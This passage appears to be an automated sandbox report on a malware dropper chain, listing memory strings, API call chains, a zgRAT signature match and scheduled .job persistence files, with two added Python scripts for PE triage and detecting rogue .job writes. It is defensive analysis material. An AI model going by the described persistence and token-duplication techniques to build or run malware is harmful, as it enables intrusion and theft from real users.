00000008.00000003.2245014329.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2259948255.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2258255190.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2243359336.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2257231941.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2242286156.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: MPGPH131.exe, 00000014.00000003.2351242676.00000000079D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 2531414c80.exe, 00000008.00000003.2246698815.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2263027375.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2250377410.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2242976435.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2237987811.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2250022722.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2236789799.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2262315779.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2252002938.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2248838364.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2242573192.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2251127325.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000002.2516925001.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2259361642.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2253196095.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2245014329.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2259948255.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2258255190.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2243359336.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2257231941.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2242286156.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: 2531414c80.exe, 00000008.00000002.2516925001.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2300158551.0000000007E49000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2324847238.0000000007E46000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2506556496.0000000007E40000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2306724573.0000000007E46000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2301470542.0000000007E49000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2299159768.0000000007E44000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304704157.0000000007E44000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2300712531.0000000007E44000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2322536020.0000000007E46000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2305456630.0000000007E44000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: 2531414c80.exe, 00000008.00000002.2516925001.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/_1
Source: 2531414c80.exe, 00000008.00000002.2516925001.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/ata
Source: 2531414c80.exe, 00000008.00000003.2246698815.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2263027375.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2250377410.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2242976435.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2237987811.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2250022722.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2236789799.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2262315779.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2252002938.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2248838364.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2242573192.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2251127325.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000002.2516925001.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2259361642.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2253196095.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2245014329.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2259948255.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2258255190.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2243359336.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2257231941.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2242286156.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/r
Source: b3168c3d9b.exe, 0000000F.00000002.2498371280.0000000003F5A000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000003.2488602462.0000000003F64000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000003.2492388851.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000003.2446883487.0000000003E8F000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000003.2447086415.0000000003EBD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2342118247.00000000079E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/account
Source: b3168c3d9b.exe, 0000000F.00000003.2491026647.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000002.2498371280.0000000003F5A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/accountJ_
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0014EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0014ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0013AB9C GetKeyState,GetKeyboardState,SetKeyboardState,PostMessageW,SendInput
Source: b3168c3d9b.exe, 00000004.00000003.2348077262.0000000003876000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _WINAPI_GETRAWINPUTDATA
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_00169576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                                System Summary

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, type: DROPPED | Matched rule: Detects zgRAT Author: ditekSHen
Source: swiiiii[1].exe.44.dr, RemoteObjects.cs | Large array initialization: RemoteObjects: array initializer size 297472
Source: swiiiii.exe.44.dr, RemoteObjects.cs | Large array initialization: RemoteObjects: array initializer size 297472
Source: b3168c3d9b.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: b3168c3d9b.exe, 00000004.00000000.2070491358.0000000000192000.00000002.00000001.01000000.00000009.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: b3168c3d9b.exe, 00000004.00000000.2070491358.0000000000192000.00000002.00000001.01000000.00000009.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: b3168c3d9b.exe, 0000000F.00000002.2493343445.0000000000192000.00000002.00000001.01000000.00000009.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: b3168c3d9b.exe, 0000000F.00000002.2493343445.0000000000192000.00000002.00000001.01000000.00000009.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: explorta.exe.0.dr | Static PE information: section name:
Source: explorta.exe.0.dr | Static PE information: section name: .idata
Source: explorta.exe.0.dr | Static PE information: section name:
Source: amert[1].exe.2.dr | Static PE information: section name:
Source: amert[1].exe.2.dr | Static PE information: section name: .idata
Source: amert[1].exe.2.dr | Static PE information: section name:
Source: amert.exe.2.dr | Static PE information: section name:
Source: amert.exe.2.dr | Static PE information: section name: .idata
Source: amert.exe.2.dr | Static PE information: section name:
Source: random[1].exe0.2.dr | Static PE information: section name:
Source: random[1].exe0.2.dr | Static PE information: section name: .idata
Source: random[1].exe0.2.dr | Static PE information: section name:
Source: 2531414c80.exe.2.dr | Static PE information: section name:
Source: 2531414c80.exe.2.dr | Static PE information: section name: .idata
Source: 2531414c80.exe.2.dr | Static PE information: section name:
Source: sarra[1].exe.2.dr | Static PE information: section name:
Source: sarra[1].exe.2.dr | Static PE information: section name: .idata
Source: sarra[1].exe.2.dr | Static PE information: section name:
Source: RageMP131.exe.8.dr | Static PE information: section name:
Source: RageMP131.exe.8.dr | Static PE information: section name: .idata
Source: RageMP131.exe.8.dr | Static PE information: section name:
Source: MPGPH131.exe.8.dr | Static PE information: section name:
Source: MPGPH131.exe.8.dr | Static PE information: section name: .idata
Source: MPGPH131.exe.8.dr | Static PE information: section name:
Source: chrosha.exe.26.dr | Static PE information: section name:
Source: chrosha.exe.26.dr | Static PE information: section name: .idata
Source: chrosha.exe.26.dr | Static PE information: section name:
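Two of the static indicators in this report are cheap to reproduce on the bench: the AutoIt3 runtime marker string ("This is a third-party compiled AutoIt script.") found in b3168c3d9b.exe, and the section tables of file.exe and its dropped payloads, where the rows above render a blank section name on either side of .idata. A blank entry is consistent with a name made of non-printable bytes, which is an assumption here rather than something the report states. The script below is an added example written for this page, not Joe Sandbox code and not part of the sample; it walks the PE headers by hand so it runs without pefile, flags section names that are empty or contain non-printable bytes, and checks for the AutoIt marker. The `build_min_pe()` fixture is a constructed, non-loadable byte layout used only so the example runs offline; pass a real file path to triage an actual sample.

```python
from __future__ import annotations

import struct

# Marker the AutoIt3 runtime embeds in every compiled script (quoted from the
# b3168c3d9b.exe rows of this report).
AUTOIT_MARKER = b"This is a third-party compiled AutoIt script."


def parse_section_names(data: bytes) -> list[bytes]:
    """Walk DOS header -> PE signature -> COFF header -> section table and
    return each section's raw 8-byte name with trailing NULs removed."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                       # IMAGE_FILE_HEADER (20 bytes) starts here
    if coff + 20 > len(data):
        raise ValueError("COFF header is truncated")
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_of_opt = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + size_of_opt           # IMAGE_SECTION_HEADER[] follows the optional header
    names = []
    for i in range(num_sections):
        off = table + i * 40                  # sizeof(IMAGE_SECTION_HEADER) == 40
        if off + 40 > len(data):
            raise ValueError("section table is truncated")
        names.append(data[off:off + 8].rstrip(b"\0"))
    return names


def is_odd_section_name(name: bytes) -> bool:
    """Heuristic (ours, not the sandbox's): an empty name, or one with bytes
    outside printable ASCII, is the kind a report renders as a blank entry."""
    return not name or any(b < 0x21 or b > 0x7E for b in name)


def triage(data: bytes) -> dict:
    """Static triage of one PE image: section names, the odd ones, AutoIt marker."""
    names = parse_section_names(data)
    return {
        "section_names": names,
        "odd_sections": [n for n in names if is_odd_section_name(n)],
        "autoit_marker": AUTOIT_MARKER in data,
    }


def build_min_pe(section_names: list[bytes], trailer: bytes = b"") -> bytes:
    """Constructed test fixture: the smallest layout parse_section_names()
    accepts. Not loadable by Windows; every header field except the section
    names and sizes is zero."""
    dos = bytearray(b"MZ".ljust(0x40, b"\0"))
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew: PE signature right after the DOS header
    size_of_opt = 0xE0                        # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, size_of_opt, 0x0102)
    headers = b"".join(n[:8].ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + b"\0" * size_of_opt + headers + trailer


if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(triage(fh.read()))
    else:
        # Offline demo: one unprintable name (constructed) between ordinary ones,
        # with the AutoIt marker appended as overlay data.
        demo = build_min_pe([b".text", b"\x0b\x02\x07", b".idata", b".rsrc"], trailer=AUTOIT_MARKER)
        print(triage(demo))
```

Run it as `python triage_pe.py file.exe` against the sample and the dropped executables; a non-empty `odd_sections` list is what the blank rows above correspond to under the assumption stated, and `autoit_marker` is expected to be true for b3168c3d9b.exe and false for the others unless they also carry the runtime. The marker check is a raw substring search over the whole file, so it also fires on a packed AutoIt payload if the string survives in an overlay or resource.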
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0013D5EB: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_00131201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0013E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\Tasks\explorta.job
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | File created: C:\Windows\Tasks\chrosha.job
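The two .job drops above are the detection-relevant rows here: C:\Windows\Tasks\*.job is the legacy Task Scheduler 1.0 job format, and on current Windows scheduled tasks are normally stored as XML under C:\Windows\System32\Tasks, so a .job written by a process running out of Desktop or Temp (file.exe and amert.exe) is a persistence signal worth alerting on. The following hunt is an added example for this page, not sandbox output or sample code. It runs over constructed FileCreate-style records that reuse Sysmon Event ID 11 field names (Image, TargetFilename, UtcTime); the three records mirror the rows above with invented timestamps, and the svchost.exe FontCache write is kept as a benign control. The writer allowlist is an assumption to be tuned per estate.

```python
from __future__ import annotations

import ntpath

# Constructed records in Sysmon Event ID 11 (FileCreate) field layout, built from
# the three "File created" rows of this report. Timestamps are invented.
SAMPLE_EVENTS = [
    {"UtcTime": "2024-04-22 10:01:03.100",
     "Image": r"C:\Users\user\Desktop\file.exe",
     "TargetFilename": r"C:\Windows\Tasks\explorta.job"},
    {"UtcTime": "2024-04-22 10:01:09.420",
     "Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp"},
    {"UtcTime": "2024-04-22 10:02:41.007",
     "Image": r"C:\Users\user\AppData\Local\Temp\1000012001\amert.exe",
     "TargetFilename": r"C:\Windows\Tasks\chrosha.job"},
]

TASKS_DIR = "c:\\windows\\tasks\\"

# Assumed allowlist of processes that legitimately write Task Scheduler 1.0 job
# files: the service host running the scheduler and the classic at.exe client.
EXPECTED_WRITERS = {
    "c:\\windows\\system32\\svchost.exe",
    "c:\\windows\\system32\\at.exe",
}


def is_suspicious_job_write(event: dict) -> bool:
    """True when a .job lands directly in C:\\Windows\\Tasks from a writer that
    is not on the allowlist. Comparison is case-insensitive, like NTFS."""
    target = event["TargetFilename"].lower()
    image = event["Image"].lower()
    if not (target.startswith(TASKS_DIR) and target.endswith(".job")):
        return False
    return image not in EXPECTED_WRITERS


def writer_in_user_path(image: str) -> bool:
    """Heuristic for 'runs from a user-writable location' (our own, not Sysmon's)."""
    low = image.lower()
    return low.startswith("c:\\users\\") or "\\appdata\\" in low or "\\temp\\" in low


def hunt(events) -> list[dict]:
    """Return one finding per suspicious .job write, enriched for the analyst."""
    findings = []
    for ev in events:
        if is_suspicious_job_write(ev):
            findings.append({
                "time": ev["UtcTime"],
                "job": ntpath.basename(ev["TargetFilename"]),
                "writer": ev["Image"],
                "writer_in_user_path": writer_in_user_path(ev["Image"]),
            })
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['time']}  {f['job']:<14} written by {f['writer']}"
              f"{'  [user-writable path]' if f['writer_in_user_path'] else ''}")
```

Feeding the constructed records through `hunt()` yields exactly the two .job rows and not the svchost write. In production the same predicate translates directly into a SIEM query on Sysmon 11 (or Windows 4663 with auditing on C:\Windows\Tasks); keep the allowlist short, because the whole point of the rule is that almost nothing on a modern host should be writing legacy .job files.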
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Code function: 2_2_005D703B
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Code function: 2_2_005D2480
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Code function: 2_2_005D2918
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Code function: 2_2_005C7633
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Code function: 2_2_005D6F1B
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Code function: 2_2_005D67C9
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Code function: 2_2_005D8380
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_00142046
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000D8060
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_00138298
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0010E4FF
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0010676B
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_00164873
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000FCAA0
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000DCAF0
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000ECC39
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_00106DD9
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000EB119
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000D91C0
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000F1394
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000F1706
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000F781B
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000D7920
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000E997D
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000F19B0
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000F7A4A
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000F1C77
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000F7CA7
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0015BE44
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_00109EEE
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000F1F32
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_00868080
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_007B001D
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_008061D0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_0084D2B0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_0084C3E0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_007EF730
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_0084B7E0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_008AC8D0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_0077B8E0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_008449B0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_00808A80
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_00801A60
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_0080CBF0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_00817D20
